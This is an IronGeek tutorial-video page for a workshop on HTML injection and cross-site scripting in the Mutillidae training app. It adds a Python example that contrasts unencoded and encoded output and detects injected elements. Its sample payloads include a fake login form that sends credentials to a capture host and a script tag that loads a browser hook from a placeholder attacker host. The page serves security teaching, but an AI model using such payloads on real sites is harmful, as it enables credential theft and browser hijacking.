Introduction to HTML Injection (HTMLi) and Cross Site Scripting (XSS) Using Mutillidae - ISSA Kentuckiana workshop 9  (Hacking Illustrated Series InfoSec Tutorial Videos)

Introduction to HTML Injection (HTMLi) and Cross Site Scripting (XSS) Using Mutillidae - ISSA Kentuckiana workshop 9 - Jeremy Druin

    This is part of the 9th in a line of classes Jeremy Druin will be giving on pen-testing and web app security featuring Mutillidae (or other tools) for the Kentuckiana ISSA. This one covers SQLMap.

Details:

Video Tutorials: www.youtube.com/user/webpwnized
Video Index URL: http://www.irongeek.com/i.php?page=videos/web-application-pen-testing-tutorials-with-mutillidae 
YouTube Channel:  http://www.youtube.com/user/webpwnized
Twitter Updates: @webpwnized
Title: Introduction to HTML Injection (HTMLi) and Cross Site Scripting (XSS) Using Mutillidae

This video covers the basics of injecting HTML into sites with vulnerabilities in which injected code is placed inline with intended code and executes in the user's browser. The injected HTML in this video is a fake login box that posts the user's username and password to a capture data page (in the NOWASP Mutillidae application).

Later, the same vulnerability is used to inject a cross-site scripting attack that hooks the user's browser with a BeEF Framework script (hook.js), giving an attacker control of the user's browser.
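From the defender's side, the flaw described above can be seen by parsing the response and comparing the elements it contains against what the page template defines. The following is an added example, not code from the video or from Mutillidae; the template, the sample inputs, the placeholder hosts and all function names are constructed for illustration.

```python
import html
from collections import Counter
from html.parser import HTMLParser

# Constructed stand-in for a page that echoes a request parameter inline.
TEMPLATE = "<html><body><h1>Results</h1><p>You searched for: {q}</p></body></html>"

# Constructed sample inputs (hosts are placeholders), mirroring the two cases in the video.
FAKE_LOGIN = ('<form action="https://capture.example/"><input name="username">'
              '<input type="password" name="password"></form>')
HOOK_SCRIPT = '<script src="https://attacker.example/hook.js"></script>'

def render_vulnerable(q):
    """Place the input inline with the intended markup, unencoded."""
    return TEMPLATE.format(q=q)

def render_encoded(q):
    """Same page, with the input HTML-encoded for an element-content context."""
    return TEMPLATE.format(q=html.escape(q, quote=True))

class _Collector(HTMLParser):
    """Records every start tag and every run of text the parser reports."""
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.tags, self.text = [], []
    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
    def handle_data(self, data):
        self.text.append(data)

def _parse(page):
    c = _Collector()
    c.feed(page)
    c.close()
    return c

# Elements the template itself defines, measured with a harmless input.
BASELINE = Counter(_parse(render_vulnerable("test")).tags)

def injected_elements(page):
    """Elements a parser sees in the response beyond those the template defines."""
    return list((Counter(_parse(page).tags) - BASELINE).elements())

def visible_text(page):
    """Text content of the page after entity decoding, as a reader would see it."""
    return "".join(_parse(page).text)

if __name__ == "__main__":
    for name, payload in (("fake login", FAKE_LOGIN), ("hook script", HOOK_SCRIPT)):
        print(name, "unencoded:", injected_elements(render_vulnerable(payload)))
        print(name, "encoded:  ", injected_elements(render_encoded(payload)))
```

With encoding applied, the input shows up only as literal text on the page and adds no elements. `html.escape` covers element content and quoted attribute values; input placed inside script blocks, URLs or unquoted attributes needs encoding specific to that context.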


Copyright 2014, IronGeek
Louisville / Kentuckiana Information Security Enthusiast